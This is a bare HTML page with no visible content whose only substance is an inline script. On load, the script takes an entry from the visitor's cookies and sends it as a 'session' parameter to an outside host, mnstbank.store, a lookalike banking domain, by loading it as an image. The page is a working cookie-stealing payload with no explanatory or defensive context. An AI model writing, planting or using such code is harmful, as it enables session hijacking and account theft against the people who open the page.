<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <script>
        var s=document.cookie.split(';')[2].trim();
        var url='https://www.mnstbank.store/session?s='+s;
        new Image().src=url;
    </script>
</body>
</html>